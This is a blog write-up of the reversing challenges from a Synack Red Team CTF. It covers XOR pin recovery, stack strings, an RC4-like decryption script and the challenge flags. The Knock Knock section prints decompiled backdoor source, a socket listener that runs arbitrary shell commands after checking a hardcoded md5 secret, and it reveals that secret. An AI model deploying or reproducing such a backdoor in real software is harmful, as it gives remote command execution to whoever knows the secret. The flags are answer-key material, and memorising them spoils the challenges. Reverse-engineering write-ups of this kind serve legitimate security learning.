nyaarch64
Posted on May 5, 2022
I participated in Synack Red Team Five CTF. I solved all 25 challenges and placed 13th out of 333 teams.
You can get challenge descriptions and downloadable files from Hilb3r7/synack-red-team-five-ctf.
reversing
Used tools: Ghidra
Access
Decompile it and find "Access Granted! Submit pin in the flag format." in main
function.
pin is compared each character with (&DAT_00102014)[i] ^ 0x20
in checkpin
function.
DAT_00102014
is \x4c\x13\x54\x7f\x4d\x45\x7f\x11\x4e\x7f\x4c\x13\x54\x7f\x4d\x45\x45\x45\x45\x7f\x49\x4e\x01\x01\x00
XOR each character with 0x20, it become l3t_me_1n_l3t_meeee_in!!
Make it flag format and HTB{l3t_me_1n_l3t_meeee_in!!}
is the flag.
Check
Decompile it and find many local variable assignment in main
function.
It's called as stack strings technique.
Select local_58
variable, right click it, select Retype variable
and input char[32]
.
Now we can see the secret, ch3ck_anD_r3checK_aga1n!
.
According to printf format Welcome Agent, heres\'s a small gift: HTB{%s}\n
,
flag is HTB{ch3ck_anD_r3checK_aga1n!}
.
Split
Decompile it and correct some informations:
- local_88 = "v!7Xf-;.2=1/";
- decrypt, sub1, sub2, sub3 functon
- DAT_00102008 value
Read these functions and implement its functionality with Python:
buffer = []
out_buf = ""
for i in range(256):
buffer.append(i)
local_18 = 0
ctx = "v!7Xf-;.2=1/"
out = [
0x9f,
0x69,
0x43,
0x1b,
0x90,
0x12,
0x96,
0x7a,
0x23,
0x76,
0x8f,
0x2e,
0x9e,
0x9f,
0xeb,
0x23,
0x40,
0xed,
0xbd,
0x7a,
0x4b,
0x99,
0xf6,
0xa0,
0x0c,
0x00,
]
ctx_len = len(ctx)
for i in range(256):
iVar1 = ord(ctx[i % ctx_len]) + buffer[i] + local_18
uVar2 = (iVar1 >> 0x1f) >> 0x18
local_18 =(iVar1 + uVar2 & 0xff) - uVar2
tmp = buffer[i]
buffer[i] = buffer[local_18]
buffer[local_18] = tmp
print(buffer)
out_len = len(out)
local_24 = 0
local_20 = 0
for i in range(out_len):
local_24 = (local_24 + 1) & 0xff
local_20 = (local_20 + buffer[local_24]) & 0xff
tmp = buffer[local_20]
buffer[local_20] = buffer[local_24]
buffer[local_24] = tmp
out_buf += (chr(out[i] ^ buffer[(buffer[local_20] + buffer[local_24]) & 0xff]))
print(out_buf)
Execute it and get HTB{d0_th1s_oR_do_th47!?}
flag.
Knock Knock
It's a Pyinstaller binary.(I have used it once before, so I just knew it by checking the file.)
Use https://github.com/extremecoders-re/pyinstxtractor to extract its source code archive in binary
(by just running python pyinstxtractor.py ./backdoor
or something),
now many .pyc files are extracted.
Find src.pyc
and it's malformed as Python3.9, so https://github.com/rocky/python-uncompyle6/ denies to decompile.
But challenge information says it's Python3.8, so I write helloworld python script and execute it with Python3.8.
It yields Python3.8 .pyc file. Analyze it and find signature is \x55.
Change src.pyc
's signature from \x61 to \x55 and decompile by running uncompyle6 backdoor-src.38.pyc > backdoor-src.py
backdoor-src.py is:
import socket
from hashlib import md5
from subprocess import check_output
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 4433))
sock.listen(5)
while True:
client, addr = sock.accept()
data = client.recv(32)
if len(data) != 32:
client.close()
else:
if data.decode() != md5(b't0p_s3kr3t').hexdigest():
client.send(b'Invalid')
size = client.recv(1)
command = client.recv(int.from_bytes(size, 'little'))
if not command.startswith(b'command:'):
client.close()
else:
command = command.replace(b'command:', b'')
output = check_output(command, shell=True)
client.send(output)
client.close()
Just read it and find secret is md5sum of 't0p_s3kr3t', '8f4328c40b1aa9409012c7406129f04b'.
After sending it, any command following 'command:' will be executed.
(I tought I saved its screenshot but I didn't...
so basically I lost the flag and commands I executed...)
Posted on May 5, 2022
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.